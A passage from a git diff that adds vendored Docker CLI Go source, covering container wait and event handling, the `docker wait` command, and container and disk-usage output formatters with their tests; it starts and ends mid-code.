+				code, cerr := strconv.Atoi(v)
+				if cerr != nil {
+					logrus.Errorf("failed to convert exitcode '%q' to int: %v", v, cerr)
+				} else {
+					exitCode = code
+				}
+			}
+			if !waitRemove {
+				stopProcessing = true
+			} else {
+				// If we are talking to an older daemon, `AutoRemove` is not supported.
+				// We need to fall back to the old behavior, which is client-side removal
+				if versions.LessThan(dockerCli.Client().ClientVersion(), "1.25") {
+					go func() {
+						removeErr = dockerCli.Client().ContainerRemove(ctx, containerID, types.ContainerRemoveOptions{RemoveVolumes: true})
+						if removeErr != nil {
+							logrus.Errorf("error removing container: %v", removeErr)
+							cancel() // cancel the event Q
+						}
+					}()
+				}
+			}
+		case "detach":
+			exitCode = 0
+			stopProcessing = true
+		case "destroy":
+			stopProcessing = true
+		}
+		return stopProcessing
+	}
+
+	go func() {
+		defer func() {
+			statusChan <- exitCode // must always send an exit code or the caller will block
+			cancel()
+		}()
+
+		for {
+			select {
+			case <-eventCtx.Done():
+				if removeErr != nil {
+					return
+				}
+			case evt := <-eventq:
+				if eventProcessor(evt) {
+					return
+				}
+			case err := <-errq:
+				logrus.Errorf("error getting events from daemon: %v", err)
+				return
+			}
+		}
+	}()
+
+	return statusChan
+}
+
+// getExitCode performs an inspect on the container. It returns
+// the running state and the exit code.
+func getExitCode(ctx context.Context, dockerCli *command.DockerCli, containerID string) (bool, int, error) {
+	c, err := dockerCli.Client().ContainerInspect(ctx, containerID)
+	if err != nil {
+		// If we can't connect, then the daemon probably died.
+		if !clientapi.IsErrConnectionFailed(err) {
+			return false, -1, err
+		}
+		return false, -1, nil
+	}
+	return c.State.Running, c.State.ExitCode, nil
+}
+
+func parallelOperation(ctx context.Context, containers []string, op func(ctx context.Context, container string) error) chan error {
+	if len(containers) == 0 {
+		return nil
+	}
+	const defaultParallel int = 50
+	sem := make(chan struct{}, defaultParallel)
+	errChan := make(chan error)
+
+	// make sure result is printed in correct order
+	output := map[string]chan error{}
+	for _, c := range containers {
+		output[c] = make(chan error, 1)
+	}
+	go func() {
+		for _, c := range containers {
+			err := <-output[c]
+			errChan <- err
+		}
+	}()
+
+	go func() {
+		for _, c := range containers {
+			sem <- struct{}{} // Wait for active queue sem to drain.
+			go func(container string) {
+				output[container] <- op(ctx, container)
+				<-sem
+			}(c)
+		}
+	}()
+	return errChan
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/wait.go b/vendor/github.com/docker/docker/cli/command/container/wait.go
new file mode 100644
index 0000000000..19ccf7ac25
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/wait.go
@@ -0,0 +1,50 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type waitOptions struct {
+	containers []string
+}
+
+// NewWaitCommand creates a new cobra.Command for `docker wait`
+func NewWaitCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts waitOptions
+
+	cmd := &cobra.Command{
+		Use:   "wait CONTAINER [CONTAINER...]",
+		Short: "Block until one or more containers stop, then print their exit codes",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runWait(dockerCli, &opts)
+		},
+	}
+	return cmd
+}
+
+func runWait(dockerCli *command.DockerCli, opts *waitOptions) error {
+	ctx := context.Background()
+
+	var errs []string
+	for _, container := range opts.containers {
+		status, err := dockerCli.Client().ContainerWait(ctx, container)
+		if err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%d\n", status)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/events_utils.go b/vendor/github.com/docker/docker/cli/command/events_utils.go
new file mode 100644
index 0000000000..e710c97576
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/events_utils.go
@@ -0,0 +1,49 @@
+package command
+
+import (
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	eventtypes "github.com/docker/docker/api/types/events"
+)
+
+type eventProcessor func(eventtypes.Message, error) error
+
+// EventHandler is abstract interface for user to customize
+// own handle functions of each type of events
+type EventHandler interface {
+	Handle(action string, h func(eventtypes.Message))
+	Watch(c <-chan eventtypes.Message)
+}
+
+// InitEventHandler initializes and returns an EventHandler
+func InitEventHandler() EventHandler {
+	return &eventHandler{handlers: make(map[string]func(eventtypes.Message))}
+}
+
+type eventHandler struct {
+	handlers map[string]func(eventtypes.Message)
+	mu       sync.Mutex
+}
+
+func (w *eventHandler) Handle(action string, h func(eventtypes.Message)) {
+	w.mu.Lock()
+	w.handlers[action] = h
+	w.mu.Unlock()
+}
+
+// Watch ranges over the passed in event chan and processes the events based on the
+// handlers created for a given action.
+// To stop watching, close the event chan.
+func (w *eventHandler) Watch(c <-chan eventtypes.Message) {
+	for e := range c {
+		w.mu.Lock()
+		h, exists := w.handlers[e.Action]
+		w.mu.Unlock()
+		if !exists {
+			continue
+		}
+		logrus.Debugf("event handler: received event: %v", e)
+		go h(e)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container.go b/vendor/github.com/docker/docker/cli/command/formatter/container.go
new file mode 100644
index 0000000000..6273453355
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/container.go
@@ -0,0 +1,235 @@
+package formatter
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/stringutils"
+	units "github.com/docker/go-units"
+)
+
+const (
+	defaultContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Ports}}\t{{.Names}}"
+
+	containerIDHeader = "CONTAINER ID"
+	namesHeader       = "NAMES"
+	commandHeader     = "COMMAND"
+	runningForHeader  = "CREATED"
+	statusHeader      = "STATUS"
+	portsHeader       = "PORTS"
+	mountsHeader      = "MOUNTS"
+	localVolumes      = "LOCAL VOLUMES"
+	networksHeader    = "NETWORKS"
+)
+
+// NewContainerFormat returns a Format for rendering using a Context
+func NewContainerFormat(source string, quiet bool, size bool) Format {
+	switch source {
+	case TableFormatKey:
+		if quiet {
+			return defaultQuietFormat
+		}
+		format := defaultContainerTableFormat
+		if size {
+			format += `\t{{.Size}}`
+		}
+		return Format(format)
+	case RawFormatKey:
+		if quiet {
+			return `container_id: {{.ID}}`
+		}
+		format := `container_id: {{.ID}}
+image: {{.Image}}
+command: {{.Command}}
+created_at: {{.CreatedAt}}
+status: {{- pad .Status 1 0}}
+names: {{.Names}}
+labels: {{- pad .Labels 1 0}}
+ports: {{- pad .Ports 1 0}}
+`
+		if size {
+			format += `size: {{.Size}}\n`
+		}
+		return Format(format)
+	}
+	return Format(source)
+}
+
+// ContainerWrite renders the context for a list of containers
+func ContainerWrite(ctx Context, containers []types.Container) error {
+	render := func(format func(subContext subContext) error) error {
+		for _, container := range containers {
+			err := format(&containerContext{trunc: ctx.Trunc, c: container})
+			if err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+	return ctx.Write(&containerContext{}, render)
+}
+
+type containerContext struct {
+	HeaderContext
+	trunc bool
+	c     types.Container
+}
+
+func (c *containerContext) MarshalJSON() ([]byte, error) {
+	return marshalJSON(c)
+}
+
+func (c *containerContext) ID() string {
+	c.AddHeader(containerIDHeader)
+	if c.trunc {
+		return stringid.TruncateID(c.c.ID)
+	}
+	return c.c.ID
+}
+
+func (c *containerContext) Names() string {
+	c.AddHeader(namesHeader)
+	names := stripNamePrefix(c.c.Names)
+	if c.trunc {
+		for _, name := range names {
+			if len(strings.Split(name, "/")) == 1 {
+				names = []string{name}
+				break
+			}
+		}
+	}
+	return strings.Join(names, ",")
+}
+
+func (c *containerContext) Image() string {
+	c.AddHeader(imageHeader)
+	if c.c.Image == "" {
+		return "<no image>"
+	}
+	if c.trunc {
+		if trunc := stringid.TruncateID(c.c.ImageID); trunc == stringid.TruncateID(c.c.Image) {
+			return trunc
+		}
+	}
+	return c.c.Image
+}
+
+func (c *containerContext) Command() string {
+	c.AddHeader(commandHeader)
+	command := c.c.Command
+	if c.trunc {
+		command = stringutils.Ellipsis(command, 20)
+	}
+	return strconv.Quote(command)
+}
+
+func (c *containerContext) CreatedAt() string {
+	c.AddHeader(createdAtHeader)
+	return time.Unix(int64(c.c.Created), 0).String()
+}
+
+func (c *containerContext) RunningFor() string {
+	c.AddHeader(runningForHeader)
+	createdAt := time.Unix(int64(c.c.Created), 0)
+	return units.HumanDuration(time.Now().UTC().Sub(createdAt))
+}
+
+func (c *containerContext) Ports() string {
+	c.AddHeader(portsHeader)
+	return api.DisplayablePorts(c.c.Ports)
+}
+
+func (c *containerContext) Status() string {
+	c.AddHeader(statusHeader)
+	return c.c.Status
+}
+
+func (c *containerContext) Size() string {
+	c.AddHeader(sizeHeader)
+	srw := units.HumanSizeWithPrecision(float64(c.c.SizeRw), 3)
+	sv := units.HumanSizeWithPrecision(float64(c.c.SizeRootFs), 3)
+
+	sf := srw
+	if c.c.SizeRootFs > 0 {
+		sf = fmt.Sprintf("%s (virtual %s)", srw, sv)
+	}
+	return sf
+}
+
+func (c *containerContext) Labels() string {
+	c.AddHeader(labelsHeader)
+	if c.c.Labels == nil {
+		return ""
+	}
+
+	var joinLabels []string
+	for k, v := range c.c.Labels {
+		joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v))
+	}
+	return strings.Join(joinLabels, ",")
+}
+
+func (c *containerContext) Label(name string) string {
+	n := strings.Split(name, ".")
+	r := strings.NewReplacer("-", " ", "_", " ")
+	h := r.Replace(n[len(n)-1])
+
+	c.AddHeader(h)
+
+	if c.c.Labels == nil {
+		return ""
+	}
+	return c.c.Labels[name]
+}
+
+func (c *containerContext) Mounts() string {
+	c.AddHeader(mountsHeader)
+
+	var name string
+	var mounts []string
+	for _, m := range c.c.Mounts {
+		if m.Name == "" {
+			name = m.Source
+		} else {
+			name = m.Name
+		}
+		if c.trunc {
+			name = stringutils.Ellipsis(name, 15)
+		}
+		mounts = append(mounts, name)
+	}
+	return strings.Join(mounts, ",")
+}
+
+func (c *containerContext) LocalVolumes() string {
+	c.AddHeader(localVolumes)
+
+	count := 0
+	for _, m := range c.c.Mounts {
+		if m.Driver == "local" {
+			count++
+		}
+	}
+
+	return fmt.Sprintf("%d", count)
+}
+
+func (c *containerContext) Networks() string {
+	c.AddHeader(networksHeader)
+
+	if c.c.NetworkSettings == nil {
+		return ""
+	}
+
+	networks := []string{}
+	for k := range c.c.NetworkSettings.Networks {
+		networks = append(networks, k)
+	}
+
+	return strings.Join(networks, ",")
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go
new file mode 100644
index 0000000000..16137897b9
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go
@@ -0,0 +1,398 @@
+package formatter
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestContainerPsContext(t *testing.T) {
+	containerID := stringid.GenerateRandomID()
+	unix := time.Now().Add(-65 * time.Second).Unix()
+
+	var ctx containerContext
+	cases := []struct {
+		container types.Container
+		trunc     bool
+		expValue  string
+		expHeader string
+		call      func() string
+	}{
+		{types.Container{ID: containerID}, true, stringid.TruncateID(containerID), containerIDHeader, ctx.ID},
+		{types.Container{ID: containerID}, false, containerID, containerIDHeader, ctx.ID},
+		{types.Container{Names: []string{"/foobar_baz"}}, true, "foobar_baz", namesHeader, ctx.Names},
+		{types.Container{Image: "ubuntu"}, true, "ubuntu", imageHeader, ctx.Image},
+		{types.Container{Image: "verylongimagename"}, true, "verylongimagename", imageHeader, ctx.Image},
+		{types.Container{Image: "verylongimagename"}, false, "verylongimagename", imageHeader, ctx.Image},
+		{types.Container{
+			Image:   "a5a665ff33eced1e0803148700880edab4",
+			ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5",
+		},
+			true,
+			"a5a665ff33ec",
+			imageHeader,
+			ctx.Image,
+		},
+		{types.Container{
+			Image:   "a5a665ff33eced1e0803148700880edab4",
+			ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5",
+		},
+			false,
+			"a5a665ff33eced1e0803148700880edab4",
+			imageHeader,
+			ctx.Image,
+		},
+		{types.Container{Image: ""}, true, "<no image>", imageHeader, ctx.Image},
+		{types.Container{Command: "sh -c 'ls -la'"}, true, `"sh -c 'ls -la'"`, commandHeader, ctx.Command},
+		{types.Container{Created: unix}, true, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt},
+		{types.Container{Ports: []types.Port{{PrivatePort: 8080, PublicPort: 8080, Type: "tcp"}}}, true, "8080/tcp", portsHeader, ctx.Ports},
+		{types.Container{Status: "RUNNING"}, true, "RUNNING", statusHeader, ctx.Status},
+		{types.Container{SizeRw: 10}, true, "10 B", sizeHeader, ctx.Size},
+		{types.Container{SizeRw: 10, SizeRootFs: 20}, true, "10 B (virtual 20 B)", sizeHeader, ctx.Size},
+		{types.Container{}, true, "", labelsHeader, ctx.Labels},
+		{types.Container{Labels: map[string]string{"cpu": "6", "storage": "ssd"}}, true, "cpu=6,storage=ssd", labelsHeader, ctx.Labels},
+		{types.Container{Created: unix}, true, "About a minute", runningForHeader, ctx.RunningFor},
+		{types.Container{
+			Mounts: []types.MountPoint{
+				{
+					Name:   "this-is-a-long-volume-name-and-will-be-truncated-if-trunc-is-set",
+					Driver: "local",
+					Source: "/a/path",
+				},
+			},
+		}, true, "this-is-a-lo...", mountsHeader, ctx.Mounts},
+		{types.Container{
+			Mounts: []types.MountPoint{
+				{
+					Driver: "local",
+					Source: "/a/path",
+				},
+			},
+		}, false, "/a/path", mountsHeader, ctx.Mounts},
+		{types.Container{
+			Mounts: []types.MountPoint{
+				{
+					Name:   "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203",
+					Driver: "local",
+					Source: "/a/path",
+				},
+			},
+		}, false, "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", mountsHeader, ctx.Mounts},
+	}
+
+	for _, c := range cases {
+		ctx = containerContext{c: c.container, trunc: c.trunc}
+		v := c.call()
+		if strings.Contains(v, ",") {
+			compareMultipleValues(t, v, c.expValue)
+		} else if v != c.expValue {
+			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
+		}
+
+		h := ctx.FullHeader()
+		if h != c.expHeader {
+			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
+		}
+	}
+
+	c1 := types.Container{Labels: map[string]string{"com.docker.swarm.swarm-id": "33", "com.docker.swarm.node_name": "ubuntu"}}
+	ctx = containerContext{c: c1, trunc: true}
+
+	sid := ctx.Label("com.docker.swarm.swarm-id")
+	node := ctx.Label("com.docker.swarm.node_name")
+	if sid != "33" {
+		t.Fatalf("Expected 33, was %s\n", sid)
+	}
+
+	if node != "ubuntu" {
+		t.Fatalf("Expected ubuntu, was %s\n", node)
+	}
+
+	h := ctx.FullHeader()
+	if h != "SWARM ID\tNODE NAME" {
+		t.Fatalf("Expected %s, was %s\n", "SWARM ID\tNODE NAME", h)
+
+	}
+
+	c2 := types.Container{}
+	ctx = containerContext{c: c2, trunc: true}
+
+	label := ctx.Label("anything.really")
+	if label != "" {
+		t.Fatalf("Expected an empty string, was %s", label)
+	}
+
+	ctx = containerContext{c: c2, trunc: true}
+	FullHeader := ctx.FullHeader()
+	if FullHeader != "" {
+		t.Fatalf("Expected FullHeader to be empty, was %s", FullHeader)
+	}
+
+}
+
+func TestContainerContextWrite(t *testing.T) {
+	unixTime := time.Now().AddDate(0, 0, -1).Unix()
+	expectedTime := time.Unix(unixTime, 0).String()
+
+	cases := []struct {
+		context  Context
+		expected string
+	}{
+		// Errors
+		{
+			Context{Format: "{{InvalidFunction}}"},
+			`Template parsing error: template: :1: function "InvalidFunction" not defined
+`,
+		},
+		{
+			Context{Format: "{{nil}}"},
+			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
+`,
+		},
+		// Table Format
+		{
+			Context{Format: NewContainerFormat("table", false, true)},
+			`CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES               SIZE
+containerID1        ubuntu              ""                  24 hours ago                                                foobar_baz          0 B
+containerID2        ubuntu              ""                  24 hours ago                                                foobar_bar          0 B
+`,
+		},
+		{
+			Context{Format: NewContainerFormat("table", false, false)},
+			`CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
+containerID1        ubuntu              ""                  24 hours ago                                                foobar_baz
+containerID2        ubuntu              ""                  24 hours ago                                                foobar_bar
+`,
+		},
+		{
+			Context{Format: NewContainerFormat("table {{.Image}}", false, false)},
+			"IMAGE\nubuntu\nubuntu\n",
+		},
+		{
+			Context{Format: NewContainerFormat("table {{.Image}}", false, true)},
+			"IMAGE\nubuntu\nubuntu\n",
+		},
+		{
+			Context{Format: NewContainerFormat("table {{.Image}}", true, false)},
+			"IMAGE\nubuntu\nubuntu\n",
+		},
+		{
+			Context{Format: NewContainerFormat("table", true, false)},
+			"containerID1\ncontainerID2\n",
+		},
+		// Raw Format
+		{
+			Context{Format: NewContainerFormat("raw", false, false)},
+			fmt.Sprintf(`container_id: containerID1
+image: ubuntu
+command: ""
+created_at: %s
+status:
+names: foobar_baz
+labels:
+ports:
+
+container_id: containerID2
+image: ubuntu
+command: ""
+created_at: %s
+status:
+names: foobar_bar
+labels:
+ports:
+
+`, expectedTime, expectedTime),
+		},
+		{
+			Context{Format: NewContainerFormat("raw", false, true)},
+			fmt.Sprintf(`container_id: containerID1
+image: ubuntu
+command: ""
+created_at: %s
+status:
+names: foobar_baz
+labels:
+ports:
+size: 0 B
+
+container_id: containerID2
+image: ubuntu
+command: ""
+created_at: %s
+status:
+names: foobar_bar
+labels:
+ports:
+size: 0 B
+
+`, expectedTime, expectedTime),
+		},
+		{
+			Context{Format: NewContainerFormat("raw", true, false)},
+			"container_id: containerID1\ncontainer_id: containerID2\n",
+		},
+		// Custom Format
+		{
+			Context{Format: "{{.Image}}"},
+			"ubuntu\nubuntu\n",
+		},
+		{
+			Context{Format: NewContainerFormat("{{.Image}}", false, true)},
+			"ubuntu\nubuntu\n",
+		},
+	}
+
+	for _, testcase := range cases {
+		containers := []types.Container{
+			{ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unixTime},
+			{ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unixTime},
+		}
+		out := bytes.NewBufferString("")
+		testcase.context.Output = out
+		err := ContainerWrite(testcase.context, containers)
+		if err != nil {
+			assert.Error(t, err, testcase.expected)
+		} else {
+			assert.Equal(t, out.String(), testcase.expected)
+		}
+	}
+}
+
+func TestContainerContextWriteWithNoContainers(t *testing.T) {
+	out := bytes.NewBufferString("")
+	containers := []types.Container{}
+
+	contexts := []struct {
+		context  Context
+		expected string
+	}{
+		{
+			Context{
+				Format: "{{.Image}}",
+				Output: out,
+			},
+			"",
+		},
+		{
+			Context{
+				Format: "table {{.Image}}",
+				Output: out,
+			},
+			"IMAGE\n",
+		},
+		{
+			Context{
+				Format: NewContainerFormat("{{.Image}}", false, true),
+				Output: out,
+			},
+			"",
+		},
+		{
+			Context{
+				Format: NewContainerFormat("table {{.Image}}", false, true),
+				Output: out,
+			},
+			"IMAGE\n",
+		},
+		{
+			Context{
+				Format: "table {{.Image}}\t{{.Size}}",
+				Output: out,
+			},
+			"IMAGE               SIZE\n",
+		},
+		{
+			Context{
+				Format: NewContainerFormat("table {{.Image}}\t{{.Size}}", false, true),
+				Output: out,
+			},
+			"IMAGE               SIZE\n",
+		},
+	}
+
+	for _, context := range contexts {
+		ContainerWrite(context.context, containers)
+		assert.Equal(t, context.expected, out.String())
+		// Clean buffer
+		out.Reset()
+	}
+}
+
+func TestContainerContextWriteJSON(t *testing.T) {
+	unix := time.Now().Add(-65 * time.Second).Unix()
+	containers := []types.Container{
+		{ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unix},
+		{ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unix},
+	}
+	expectedCreated := time.Unix(unix, 0).String()
+	expectedJSONs := []map[string]interface{}{
+		{"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID1", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_baz", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""},
+		{"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID2", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_bar", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""},
+	}
+	out := bytes.NewBufferString("")
+	err := ContainerWrite(Context{Format: "{{json .}}", Output: out}, containers)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
+		t.Logf("Output: line %d: %s", i, line)
+		var m map[string]interface{}
+		if err := json.Unmarshal([]byte(line), &m); err != nil {
+			t.Fatal(err)
+		}
+		assert.DeepEqual(t, m, expectedJSONs[i])
+	}
+}
+
+func TestContainerContextWriteJSONField(t *testing.T) {
+	containers := []types.Container{
+		{ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu"},
+		{ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu"},
+	}
+	out := bytes.NewBufferString("")
+	err := ContainerWrite(Context{Format: "{{json .ID}}", Output: out}, containers)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
+		t.Logf("Output: line %d: %s", i, line)
+		var s string
+		if err := json.Unmarshal([]byte(line), &s); err != nil {
+			t.Fatal(err)
+		}
+		assert.Equal(t, s, containers[i].ID)
+	}
+}
+
+func TestContainerBackCompat(t *testing.T) {
+	containers := []types.Container{{ID: "brewhaha"}}
+	cases := []string{
+		"ID",
+		"Names",
+		"Image",
+		"Command",
+		"CreatedAt",
+		"RunningFor",
+		"Ports",
+		"Status",
+		"Size",
+		"Labels",
+		"Mounts",
+	}
+	buf := bytes.NewBuffer(nil)
+	for _, c := range cases {
+		ctx := Context{Format: Format(fmt.Sprintf("{{ .%s }}", c)), Output: buf}
+		if err := ContainerWrite(ctx, containers); err != nil {
+			t.Logf("could not render template for field '%s': %v", c, err)
+			t.Fail()
+		}
+		buf.Reset()
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom.go b/vendor/github.com/docker/docker/cli/command/formatter/custom.go
new file mode 100644
index 0000000000..df32684429
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/custom.go
@@ -0,0 +1,51 @@
+package formatter
+
+import (
+	"strings"
+)
+
+const (
+	imageHeader        = "IMAGE"
+	createdSinceHeader = "CREATED"
+	createdAtHeader    = "CREATED AT"
+	sizeHeader         = "SIZE"
+	labelsHeader       = "LABELS"
+	nameHeader         = "NAME"
+	driverHeader       = "DRIVER"
+	scopeHeader        = "SCOPE"
+)
+
+type subContext interface {
+	FullHeader() string
+	AddHeader(header string)
+}
+
+// HeaderContext provides the subContext interface for managing headers
+type HeaderContext struct {
+	header []string
+}
+
+// FullHeader returns the header as a string
+func (c *HeaderContext) FullHeader() string {
+	if c.header == nil {
+		return ""
+	}
+	return strings.Join(c.header, "\t")
+}
+
+// AddHeader adds another column to the header
+func (c *HeaderContext) AddHeader(header string) {
+	if c.header == nil {
+		c.header = []string{}
+	}
+	c.header = append(c.header, strings.ToUpper(header))
+}
+
+func stripNamePrefix(ss []string) []string {
+	sss := make([]string, len(ss))
+	for i, s := range ss {
+		sss[i] = s[1:]
+	}
+
+	return sss
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go
new file mode 100644
index 0000000000..da42039dca
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go
@@ -0,0 +1,28 @@
+package formatter
+
+import (
+	"reflect"
+	"strings"
+	"testing"
+)
+
+func compareMultipleValues(t *testing.T, value, expected string) {
+	// comma-separated values means probably a map input, which won't
+	// be guaranteed to have the same order as our expected value
+	// We'll create maps and use reflect.DeepEquals to check instead:
+	entriesMap := make(map[string]string)
+	expMap := make(map[string]string)
+	entries := strings.Split(value, ",")
+	expectedEntries := strings.Split(expected, ",")
+	for _, entry := range entries {
+		keyval := strings.Split(entry, "=")
+		entriesMap[keyval[0]] = keyval[1]
+	}
+	for _, expected := range expectedEntries {
+		keyval := strings.Split(expected, "=")
+		expMap[keyval[0]] = keyval[1]
+	}
+	if !reflect.DeepEqual(expMap, entriesMap) {
+		t.Fatalf("Expected entries: %v, got: %v", expected, value)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go
new file mode 100644
index 0000000000..5309d880a5
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go
@@ -0,0 +1,334 @@
+package formatter
+
+import (
+	"bytes"
+	"fmt"
+	"strings"
+	"text/template"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	units "github.com/docker/go-units"
+)
+
+const (
+	defaultDiskUsageImageTableFormat     = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.VirtualSize}}\t{{.SharedSize}}\t{{.UniqueSize}}\t{{.Containers}}"
+	defaultDiskUsageContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.LocalVolumes}}\t{{.Size}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Names}}"
+	defaultDiskUsageVolumeTableFormat    = "table {{.Name}}\t{{.Links}}\t{{.Size}}"
+	defaultDiskUsageTableFormat          = "table {{.Type}}\t{{.TotalCount}}\t{{.Active}}\t{{.Size}}\t{{.Reclaimable}}"
+
+	typeHeader        = "TYPE"
+	totalHeader       = "TOTAL"
+	activeHeader      = "ACTIVE"
+	reclaimableHeader = "RECLAIMABLE"
+	containersHeader  = "CONTAINERS"
+	sharedSizeHeader  = "SHARED SIZE"
+	uniqueSizeHeader  = "UNIQUE SiZE"
+)
+
+// DiskUsageContext contains disk usage specific information required by the formater, encapsulate a Context struct.
+type DiskUsageContext struct {
+	Context
+	Verbose    bool
+	LayersSize int64
+	Images     []*types.ImageSummary
+	Containers []*types.Container
+	Volumes    []*types.Volume
+}
+
+func (ctx *DiskUsageContext) startSubsection(format string) (*template.Template, error) {
+	ctx.buffer = bytes.NewBufferString("")
+	ctx.header = ""
+	ctx.Format = Format(format)
+	ctx.preFormat()
+
+	return ctx.parseFormat()
+}
+
+func (ctx *DiskUsageContext) Write() {
+	if ctx.Verbose == false {
+		ctx.buffer = bytes.NewBufferString("")
+		ctx.Format = defaultDiskUsageTableFormat
+		ctx.preFormat()
+
+		tmpl, err := ctx.parseFormat()
+		if err != nil {
+			return
+		}
+
+		err = ctx.contextFormat(tmpl, &diskUsageImagesContext{
+			totalSize: ctx.LayersSize,
+			images:    ctx.Images,
+		})
+		if err != nil {
+			return
+		}
+		err = ctx.contextFormat(tmpl, &diskUsageContainersContext{
+			containers: ctx.Containers,
+		})
+		if err != nil {
+			return
+		}
+
+		err = ctx.contextFormat(tmpl, &diskUsageVolumesContext{
+			volumes: ctx.Volumes,
+		})
+		if err != nil {
+			return
+		}
+
+		ctx.postFormat(tmpl, &diskUsageContainersContext{containers: []*types.Container{}})
+
+		return
+	}
+
+	// First images
+	tmpl, err := ctx.startSubsection(defaultDiskUsageImageTableFormat)
+	if err != nil {
+		return
+	}
+
+	ctx.Output.Write([]byte("Images space usage:\n\n"))
+	for _, i := range ctx.Images {
+		repo := "<none>"
+		tag := "<none>"
+		if len(i.RepoTags) > 0 && !isDangling(*i) {
+			// Only show the first tag
+			ref, err := reference.ParseNamed(i.RepoTags[0])
+			if err != nil {
+				continue
+			}
+			if nt, ok := ref.(reference.NamedTagged); ok {
+				repo = ref.Name()
+				tag = nt.Tag()
+			}
+		}
+
+		err = ctx.contextFormat(tmpl, &imageContext{
+			repo:  repo,
+			tag:   tag,
+			trunc: true,
+			i:     *i,
+		})
+		if err != nil {
+			return
+		}
+	}
+	ctx.postFormat(tmpl, &imageContext{})
+
+	// Now containers
+	ctx.Output.Write([]byte("\nContainers space usage:\n\n"))
+	tmpl, err = ctx.startSubsection(defaultDiskUsageContainerTableFormat)
+	if err != nil {
+		return
+	}
+	for _, c := range ctx.Containers {
+		// Don't display the virtual size
+		c.SizeRootFs = 0
+		err = ctx.contextFormat(tmpl, &containerContext{
+			trunc: true,
+			c:     *c,
+		})
+		if err != nil {
+			return
+		}
+	}
+	ctx.postFormat(tmpl, &containerContext{})
+
+	// And volumes
+	ctx.Output.Write([]byte("\nLocal Volumes space usage:\n\n"))
+	tmpl, err = ctx.startSubsection(defaultDiskUsageVolumeTableFormat)
+	if err != nil {
+		return
+	}
+	for _, v := range ctx.Volumes {
+		err = ctx.contextFormat(tmpl, &volumeContext{
+			v: *v,
+		})
+		if err != nil {
+			return
+		}
+	}
+	ctx.postFormat(tmpl, &volumeContext{v: types.Volume{}})
+}
+
+type diskUsageImagesContext struct {
